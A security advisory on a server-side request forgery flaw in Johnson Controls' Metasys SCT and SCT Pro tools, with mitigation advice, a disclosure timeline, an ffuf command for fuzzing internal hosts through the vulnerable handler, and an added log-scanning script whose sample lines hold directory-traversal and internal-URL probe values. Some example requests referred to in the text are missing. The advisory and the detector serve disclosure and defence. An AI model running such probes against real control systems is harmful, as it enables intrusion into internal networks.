Advisory: Johnson Controls System Configuration Tool (SCT) and SCT Pro <= 14.2.2

Summary

A Server-Side Request Forgery (SSRF) vulnerability has been discovered in the Johnson Controls System Configuration Tool (SCT) and System Configuration Tool Pro (SCT Pro).

Vendor

Johnson Controls Inc.

Affected Version(s)

  • Metasys System Configuration Tool (SCT) <= 14.2.2

  • Metasys System Configuration Tool Pro (SCT Pro) <= 14.2.2

Risk Assessment

Clandestine Labs assesses that this vulnerability could be used to forge requests to internal systems. This could in turn allow an attacker to identify endpoints on underlying servers and potentially even gain a foothold in the internal network by exploiting those internal systems with forged web requests.

Mitigation

Johnson Controls has suggested either updating SCT/SCT Pro with patch 14.2.2 or upgrading SCT/SCT Pro to version 15 in order to mitigate this vulnerability. Additionally, CISA recommends that users:

  • Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.

  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.

  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as its connected devices.


Vulnerability Details

By supplying a parameter of the SCT_RepositoryHandler endpoint with a directory traversal sequence followed by the path to a system file, the researchers discovered a descriptive error message was being displayed based on the content of the file at the path provided. As an example, take a look at the following request:

The above request would result in an error message stating that an unexpected character was encountered while parsing the value ‘P’ at line 0, position 0. As such, the researchers could only identify the first character of the file they were accessing via the directory traversal sequence.

{"IsSuccess":false,"Message":"Unexpected character encountered while parsing value: P. Path '', line 0, position 0."}

After some trial and error, the LFI testing was halted and the researchers decided to go a different route. By supplying a remote URL as the value of the parameter field in the query string, an interesting response was received:

This error indicated that the server was attempting to reach out to the address supplied in the parameter, hinting at a potential SSRF vulnerability. To verify the expected behavior, the loopback IP was supplied to the parameter:

As shown above, this resulted in an error message similar to the one seen when accessing a file on the local system. The unexpected character < aligns with the opening bracket of the <html> tag that would appear at the beginning of the index.html file. This all but confirmed the behavior expected from an SSRF vulnerability. As a final step to verify the vulnerability, the researchers crafted requests to known internal IP addresses:

As expected, the 403 Forbidden and 404 Not Found error codes returned by the remote hosts confirmed the existence of the vulnerability. To exploit this, an attacker could simply use a web fuzzing tool such as ffuf in combination with a list of known CVE endpoints. Below is a command-line example of how an attacker could potentially exploit this vulnerability to gain a foothold in your internal network:

ffuf -w /opt/wordlists/cve-list.txt -u https://vulnerable-target.clandestinelabs.io/SCTPro/Handlers/SCT_RepositoryHandler.ashx?method=CreateHelpUpdateTask&parameter=https://10.0.0.1/FUZZ
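As an added example that is not part of the advisory, the following script shows how a defender could flag requests of the kind described above in IIS-style web server logs: calls to SCT_RepositoryHandler.ashx whose parameter value is an absolute URL (SSRF probe) or contains a parent-directory segment (traversal probe). The log format, timestamps and addresses are constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote

# Constructed sample lines in a simplified IIS W3C layout:
# date time cs-uri-stem cs-uri-query sc-status (addresses are made up).
SAMPLE_LOG = """\
2022-04-21 10:00:01 /SCTPro/Handlers/SCT_RepositoryHandler.ashx method=CreateHelpUpdateTask&parameter=Help/Update.zip 200
2022-04-21 10:00:02 /SCTPro/Handlers/SCT_RepositoryHandler.ashx method=CreateHelpUpdateTask&parameter=..%2F..%2F..%2Fwindows%2Fwin.ini 500
2022-04-21 10:00:03 /SCTPro/Handlers/SCT_RepositoryHandler.ashx method=CreateHelpUpdateTask&parameter=https%3A%2F%2F127.0.0.1%2F 500
2022-04-21 10:00:04 /SCTPro/Handlers/SCT_RepositoryHandler.ashx method=CreateHelpUpdateTask&parameter=http%3A%2F%2F10.0.0.1%2Fadmin 500
2022-04-21 10:00:05 /SCTPro/SomeOther.ashx method=Ping&parameter=https%3A%2F%2Fexample.org 200
"""

HANDLER = "sct_repositoryhandler.ashx"
# Any URL scheme at the start of the value (http://, https://, file://, ...).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# A ".." path segment delimited by / or \ (or at either end of the value).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify_parameter(value: str) -> Optional[str]:
    """Return 'ssrf' for an absolute URL, 'traversal' for a parent-directory
    segment, else None. Decodes twice so double-encoded values are caught."""
    decoded = unquote(unquote(value))
    if SCHEME_RE.match(decoded):
        return "ssrf"
    if TRAVERSAL_RE.search(decoded):
        return "traversal"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious parameter value sent to the handler."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed or comment line
        date, time, stem, query, status = parts[:5]
        if not stem.lower().endswith(HANDLER):
            continue
        for value in parse_qs(query).get("parameter", []):  # parse_qs already URL-decodes once
            kind = classify_parameter(value)
            if kind:
                findings.append({"time": f"{date} {time}", "kind": kind,
                                 "value": unquote(value), "status": status})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```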

Due to the ease of exploitability of this vulnerability, we recommend following the guidance provided in Johnson Controls Product Security Advisory JCI-PSA-2022-03 v1. See the reference section below for more information.



Credits

Scott Ponte, Founder at Black Harbor

Tony West, Founder & Lead Researcher at Clandestine Labs


Disclosure Timeline

June 5, 2021 - Discovered the vulnerability and reported to the affected organization

June 5, 2021 - Contacted the vendor to report the vulnerability

June 13, 2021 - Contacted the vendor to follow up and verify receipt of the vulnerability report

October 27, 2021 - Contacted ICS-CERT (CISA) for disclosure assistance

November 2, 2021 - Received response from Johnson Controls.

January 16, 2022 - Checked with vendor on ETA for patch/security advisory.

January 20, 2022 - Received response from vendor indicating patches would be ready by March.

March 10, 2022 - Received notification of patch, coordinated with vendor and CISA for disclosure.

April 21, 2022 - JCI-PSA-2022-03 published by Johnson Controls.

April 21, 2022 - ICSA-22-111-02 published by CISA.

